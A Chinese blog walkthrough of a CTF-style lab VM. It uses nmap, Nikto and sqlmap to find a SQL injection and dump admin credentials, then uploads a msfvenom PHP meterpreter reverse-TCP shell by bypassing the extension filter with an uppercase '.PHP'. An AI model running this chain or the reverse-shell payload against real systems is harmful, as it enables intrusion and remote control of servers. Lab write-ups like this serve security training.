CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

10 篇文章 0 订阅
3 篇文章 0 订阅

靶机地址:
链接:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg
提取码:8520
 

准备环境:

vm下kali系统和靶机

kali:192.168.111.128

靶机:192.168.111.130

首先进行信息收集这里我们用到端口扫描之王-nmap

namp -sV 192.168.111.130 探测端口服务版本

由此我们得到开放了22和80端口 对应的服务分别是ssh和apache

然后我们再进一步探测 使用Nikto -host http://192.168.111.130 // 探测敏感信息

分析信息可以得到后台目录存在/admin/login  目录下

尝试弱口令登录后无果 继续寻找信息

使用owasp zap 找到存在sql注入

存在sql注入在http://192.168.111.130/cat.php?id=3

然后使用神器sqlmap跑一下 目的得到后台管理员账号和密码

此处不得不感叹sqlmap的强大 同样的注入点比我们手工效率要快很多

得到账号admin  密码:P4ssw0rd

 

然后我们可以登录后台发现可上传文件

是我们拿shell最简单的方式

由此我们可以想到可以使用msf的生成一个php木马文件来反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.111.128 lport=4444 -f raw >shell.php

由此我们在桌面上生成了一个shell.php的文件

然后我们需要用到msfconsole

然后设置好我们需要设置的 LHOST(kali地址)和lport(监听端口之后)

进行反弹shell

然后我们exploit或者run就可以开启监听

然后把我们制作好的shell.php上传 发现不允许上传.php后缀文件

这里我们用最简单的大写绕过 改为shell.PHP

然后我们可以点击shell 如果没出错的话 kali里边是有反弹的

可以看到攻击成功 顺利拿到shell

整个测试很简单 但是 需要我们思路明确能清楚每一步的步骤和目的

此教程仅用于实验测试。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值